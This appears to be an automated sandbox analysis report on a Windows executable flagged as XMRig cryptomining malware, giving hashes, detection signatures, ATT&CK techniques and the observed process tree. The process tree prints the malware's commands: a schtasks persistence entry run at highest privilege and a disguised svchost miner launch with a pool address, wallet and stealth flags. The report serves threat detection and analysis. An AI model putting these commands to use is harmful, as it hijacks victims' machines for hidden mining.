xmrig | aed297ca559dd8cd5c719950db5d8741ac1115ed7f24ebbac1ca366a1128f595

Analysis

max time kernel
2s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
26/12/2023, 16:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7da815482a6deabaadfca2ebde258c77.exe
Size

2.1MB
MD5

7da815482a6deabaadfca2ebde258c77
SHA1

31ddcc3dcec75d0e74c5e0fb99dfc968cf3d0202
SHA256

aed297ca559dd8cd5c719950db5d8741ac1115ed7f24ebbac1ca366a1128f595
SHA512

1cfd9abfe8abd354ea011bf8ebfeb8968bdae0c8667ef2f5ca218270a21ee3614f1ab8882ce1412c0b45faacbc7cac52b1583b05fec06d74cbef1b5aad40084d
SSDEEP

49152:MlEA+BH8MHhkjb646ATB4X22StMFaTTLGej16bf4cqcj:8GBRSi4Zl4X23tPLGej16b4cq

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral2/memory/2396-66-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/2396-67-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/2396-68-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/2396-70-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/2396-69-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/2396-78-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral2/memory/2396-77-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation	7da815482a6deabaadfca2ebde258c77.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2704	schtasks.exe
732	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\7da815482a6deabaadfca2ebde258c77.exe
"C:\Users\Admin\AppData\Local\Temp\7da815482a6deabaadfca2ebde258c77.exe"
1⤵
- Checks computer location settings
PID:1932
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
  2⤵
  PID:1696
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
    3⤵
    - Creates scheduled task(s)
    PID:2704
- C:\Users\Admin\AppData\Local\Temp\Services.exe
  "C:\Users\Admin\AppData\Local\Temp\Services.exe"
  2⤵
  PID:2072
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
    3⤵
    PID:2344
- - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
    3⤵
    PID:3588
- - C:\Windows\System32\svchost.exe
    C:\Windows/System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=42z9Fe3LwWgBe2iDmJqvmHDNsAKroadk13jHpA6DaGUiR9x8hi8vrfdUbe2YyAtXBVXZLHcKNhd3BKaCGEF8UVmeQXtazxF.main/kevjazw --pass= --cpu-max-threads-hint=40 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=80 --tls --unam-stealth
    3⤵
    PID:2396
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
  2⤵
  PID:412

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
1⤵
- Creates scheduled task(s)
PID:732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Services.exe

Filesize
57KB

MD5
e2dd2c411e27864c0684d4eb2a002676

SHA1
11dd5fd965d1a305b2daacf09f65fc9b350f5184

SHA256
5266decefed5fc25719245e437e01c011a0d85672cf8de70ad8e5f8d1dd8e25b

SHA512
f44e36dca0b7eae319257eea6f9177fe49e46f8089fccfeb976477b3ffa512502d7cfcd4c8fa795f3666ea5f64a615347a52ac67c13f9b41d6d5d623b25546f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services.exe

Filesize
90KB

MD5
4db99754f18a41560bd685a9fdd2bc63

SHA1
cca4cf914cb8bd2df948deec31d64b591af0fe52

SHA256
350e00c1f3f91564b56bb7556b9bd3d813a23e22013344db6d8aac7215dd23de

SHA512
c8000af7ad9a8f9835f93d8e22e1eddf3626b45a82a83330adb5477abfbc04cb4b1b2365701f37901f3e0c2e56a317ca83455de488ee4a6646c52c8ed1654d86

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services.exe

Filesize
111KB

MD5
8522dd966cfe37471c0c6e033e69ac04

SHA1
4ca8a9a38ac019495e91a8299b2fe09395f0a704

SHA256
77b1a0ef175f6c072399596163fd3938eb8ba5acfa7a61150fae2b60cf323f43

SHA512
25862b1d48603170a25ac1c8a4dc794b832d94f5106e57660bc2eb9a4affe9afadce184086cfcf9789f0ec51f9256e234ce60857c69c93c16b885583b8ce59e7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
57KB

MD5
6a8f2c9fe6d158767ead847d912cb0f1

SHA1
8f22fe00a7d66306c9c46e2aacbc7b32d8fcb9ea

SHA256
cbec2a29bf511aec7356fa0d581ac6ee04ede1d909d9742d61141dc9736a21f9

SHA512
75e3c1e8f21a3622beaa4c697c977391ea179887dcb3be92fbfdf5a595f8b86d8f17bc398fda57a74eb593effe081b90463f4764dfc8e4067563bb1899e22f9e

Download Submit
memory/412-35-0x000000001C020000-0x000000001C030000-memory.dmp

Filesize
64KB

Download
memory/412-32-0x0000000000FA0000-0x0000000000FA6000-memory.dmp

Filesize
24KB

Download
memory/412-40-0x00007FFE33E00000-0x00007FFE348C1000-memory.dmp

Filesize
10.8MB

Download
memory/412-31-0x00007FFE33E00000-0x00007FFE348C1000-memory.dmp

Filesize
10.8MB

Download
memory/412-39-0x000000001C020000-0x000000001C030000-memory.dmp

Filesize
64KB

Download
memory/412-26-0x00000000005E0000-0x00000000005F4000-memory.dmp

Filesize
80KB

Download
memory/412-37-0x00007FFE33E00000-0x00007FFE348C1000-memory.dmp

Filesize
10.8MB

Download
memory/1932-33-0x00007FFE33E00000-0x00007FFE348C1000-memory.dmp

Filesize
10.8MB

Download
memory/1932-2-0x000000001CCF0000-0x000000001CF02000-memory.dmp

Filesize
2.1MB

Download
memory/1932-1-0x00007FFE33E00000-0x00007FFE348C1000-memory.dmp

Filesize
10.8MB

Download
memory/1932-3-0x00000000025E0000-0x00000000025F0000-memory.dmp

Filesize
64KB

Download
memory/1932-0-0x00000000009F0000-0x0000000000C16000-memory.dmp

Filesize
2.1MB

Download
memory/2072-36-0x000000001E570000-0x000000001E582000-memory.dmp

Filesize
72KB

Download
memory/2072-58-0x000000001E560000-0x000000001E56E000-memory.dmp

Filesize
56KB

Download
memory/2072-38-0x00007FFE33E00000-0x00007FFE348C1000-memory.dmp

Filesize
10.8MB

Download
memory/2072-34-0x00007FFE33E00000-0x00007FFE348C1000-memory.dmp

Filesize
10.8MB

Download
memory/2072-64-0x00007FFE33E00000-0x00007FFE348C1000-memory.dmp

Filesize
10.8MB

Download
memory/2396-59-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2396-79-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2396-61-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2396-63-0x0000021A51DB0000-0x0000021A51DC4000-memory.dmp

Filesize
80KB

Download
memory/2396-83-0x0000021A537D0000-0x0000021A537F0000-memory.dmp

Filesize
128KB

Download
memory/2396-65-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2396-60-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2396-66-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2396-67-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2396-68-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2396-70-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2396-69-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2396-71-0x0000021A55040000-0x0000021A55080000-memory.dmp

Filesize
256KB

Download
memory/2396-84-0x0000021A55080000-0x0000021A550A0000-memory.dmp

Filesize
128KB

Download
memory/2396-82-0x0000021A537D0000-0x0000021A537F0000-memory.dmp

Filesize
128KB

Download
memory/2396-74-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2396-76-0x0000021A537D0000-0x0000021A537F0000-memory.dmp

Filesize
128KB

Download
memory/2396-75-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2396-78-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2396-77-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2396-81-0x0000021A55080000-0x0000021A550A0000-memory.dmp

Filesize
128KB

Download
memory/2396-80-0x0000021A537D0000-0x0000021A537F0000-memory.dmp

Filesize
128KB

Download
memory/3588-56-0x00007FFE33E00000-0x00007FFE348C1000-memory.dmp

Filesize
10.8MB

Download
memory/3588-73-0x000000001BD30000-0x000000001BD40000-memory.dmp

Filesize
64KB

Download
memory/3588-72-0x00007FFE33E00000-0x00007FFE348C1000-memory.dmp

Filesize
10.8MB

Download
memory/3588-57-0x000000001BD30000-0x000000001BD40000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads